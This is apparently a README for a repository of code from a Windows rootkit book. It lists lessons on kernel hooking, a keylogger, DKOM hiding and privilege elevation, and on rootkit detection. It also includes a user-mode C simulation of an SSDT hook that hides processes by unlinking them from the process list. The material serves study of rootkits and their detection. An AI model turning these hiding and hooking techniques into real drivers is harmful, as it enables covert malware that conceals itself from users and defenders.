Still a work in progress.
I have arranged the code according to its order in the book.
I tested most of the code on Windows XP SP0 (no service packs installed) in a VM.
I haven't included the networking code from Chapter 9: Covert Channels (using TDI and NDIS).
The code includes the following:
- Basic driver
- Creating a file handle and a symlink
- Loading a driver using the quick and dirty way
- Loading a driver the correct way (using Service Manager)
- Decompressing a SYS file stored in the .rsrc section
- Parsing the IDT
- CR0 trick (clearing the WP bit) to disable write protection on read-only kernel pages
- Injecting a DLL using remote threads
- Hooking SSDT (using it to hide processes' names)
- Hooking the IDT
- SYSENTER hook
- Hooking the IRP major-functions table
- Hybrid hooking approach
- Detour patching
- Jump templates
- Sample keylogger (as a Layered driver)
- Grabbing OS version from the Registry
- Grabbing OS version from Kernel-Mode (OSVERSIONINFO structure)
- Hiding devices/drivers (using DKOM)
- Privilege elevation (using DKOM)
- Playing with the Keyboard LEDs (accessing the hardware directly)
- Keysniffer (by accessing the hardware directly)
- Rootkit detection methods (lessons 23-27)
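The SSDT hook that hides processes (the "Hooking SSDT" lesson above) works by swapping the NtQuerySystemInformation slot in the service table, calling the original, and then unlinking the rootkit's own entries from the NextEntryOffset-chained buffer before it reaches user mode. The following is an added example, not code from the book or from this repository: a user-mode simulation of that pattern so the unlink logic can be run and checked without a kernel driver. The service table is an ordinary array of function pointers, the "kernel" is a stub that returns a constructed five-process list, the record layout is a narrowed stand-in for SYSTEM_PROCESS_INFORMATION, and the `_root_` prefix and all names are chosen for the example.

```c
/* Added example (not from the repository): user-mode simulation of the
 * SSDT hook that hides processes by name. In the real driver the table is
 * KeServiceDescriptorTable, the slot swap is done with CR0.WP cleared
 * because the table page is read-only, and the records come from the
 * kernel; here all three are simulated so the filtering logic is testable. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Narrowed stand-in for SYSTEM_PROCESS_INFORMATION: only the fields the hook
 * touches. NextEntryOffset is the byte distance to the next record; 0 ends
 * the list. The real ImageName is a UNICODE_STRING, a char array here. */
typedef struct {
    uint32_t NextEntryOffset;
    uint32_t UniqueProcessId;
    char     ImageName[16];
} SYS_PROC_INFO;

typedef long NTSTATUS;
#define STATUS_SUCCESS              0L
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
typedef NTSTATUS (*NTQSI_FN)(void *buf, size_t len, size_t *ret_len);

static NTQSI_FN g_ssdt[1];          /* simulated service table; slot 0 = NtQuerySystemInformation */
static NTQSI_FN g_orig_nt_qsi;      /* saved original pointer: needed to call through and to unhook */
static const char HIDE_PREFIX[] = "_root_";   /* prefix chosen for the example */

/* Constructed "kernel" implementation returning a fixed process list. */
static NTSTATUS fake_NtQuerySystemInformation(void *buf, size_t len, size_t *ret_len)
{
    static const char *names[] = { "System", "_root_evil.exe", "explorer.exe", "_root_k.exe", "cmd.exe" };
    const size_t n = sizeof names / sizeof names[0];
    const size_t need = n * sizeof(SYS_PROC_INFO);
    if (ret_len) *ret_len = need;
    if (len < need) return STATUS_INFO_LENGTH_MISMATCH;
    SYS_PROC_INFO *p = (SYS_PROC_INFO *)buf;
    for (size_t i = 0; i < n; i++) {
        p[i].NextEntryOffset = (i + 1 < n) ? (uint32_t)sizeof(SYS_PROC_INFO) : 0;
        p[i].UniqueProcessId = (uint32_t)(4 * (i + 1));
        snprintf(p[i].ImageName, sizeof p[i].ImageName, "%s", names[i]);
    }
    return STATUS_SUCCESS;
}

/* The hook: let the original fill the buffer, then unlink every record whose
 * name carries HIDE_PREFIX by folding its offset into its predecessor's, so a
 * caller walking the chain never lands on it. The head entry ("System") is
 * assumed never to be a rootkit process and is not examined. */
static NTSTATUS hooked_NtQuerySystemInformation(void *buf, size_t len, size_t *ret_len)
{
    NTSTATUS st = g_orig_nt_qsi(buf, len, ret_len);
    if (st != STATUS_SUCCESS) return st;
    SYS_PROC_INFO *prev = (SYS_PROC_INFO *)buf;
    while (prev->NextEntryOffset != 0) {
        SYS_PROC_INFO *cur = (SYS_PROC_INFO *)((char *)prev + prev->NextEntryOffset);
        if (strncmp(cur->ImageName, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0)
            prev->NextEntryOffset = cur->NextEntryOffset ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
        else
            prev = cur;
    }
    return st;
}

static void install_hook(void)
{
    g_orig_nt_qsi = g_ssdt[0];                 /* save for call-through and restore */
    g_ssdt[0] = hooked_NtQuerySystemInformation; /* driver: InterlockedExchange on the SSDT slot */
}

static void remove_hook(void) { g_ssdt[0] = g_orig_nt_qsi; }

/* Query through the table as a user-mode caller would and count the records
 * reachable via NextEntryOffset; with count_hidden_only set, count only names
 * carrying HIDE_PREFIX. Returns -1 if the (simulated) call fails. */
static int walk_process_list(int hooked, int count_hidden_only)
{
    SYS_PROC_INFO buf[16];
    size_t ret = 0;
    int count = 0;
    g_ssdt[0] = fake_NtQuerySystemInformation;  /* "boot": table holds the real entry */
    if (hooked) install_hook();
    NTSTATUS st = g_ssdt[0](buf, sizeof buf, &ret);
    if (st == STATUS_SUCCESS) {
        SYS_PROC_INFO *cur = buf;
        for (;;) {
            int is_hidden = strncmp(cur->ImageName, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0;
            if (!count_hidden_only || is_hidden) count++;
            if (cur->NextEntryOffset == 0) break;
            cur = (SYS_PROC_INFO *)((char *)cur + cur->NextEntryOffset);
        }
    }
    if (hooked) remove_hook();
    return st == STATUS_SUCCESS ? count : -1;
}

int visible_processes(int hooked)         { return walk_process_list(hooked, 0); }
int visible_rootkit_processes(int hooked) { return walk_process_list(hooked, 1); }
int table_restored_after_unhook(void)     { (void)walk_process_list(1, 0); return g_ssdt[0] == fake_NtQuerySystemInformation; }

int main(void)
{
    printf("unhooked: %d processes, %d with prefix %s\n", visible_processes(0), visible_rootkit_processes(0), HIDE_PREFIX);
    printf("hooked:   %d processes, %d with prefix %s\n", visible_processes(1), visible_rootkit_processes(1), HIDE_PREFIX);
    return 0;
}
```

The unlink keeps the hidden records physically in the buffer; only the chain skips them, which is why a detector that scans the buffer byte-wise (or compares the SSDT slot against the ntoskrnl export, as the detection lessons do) can still spot them.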
Lessons were put in order ( + some added code) by: 0xbahaa
Forked from the original mirror by: fdiskyou
Links to the book: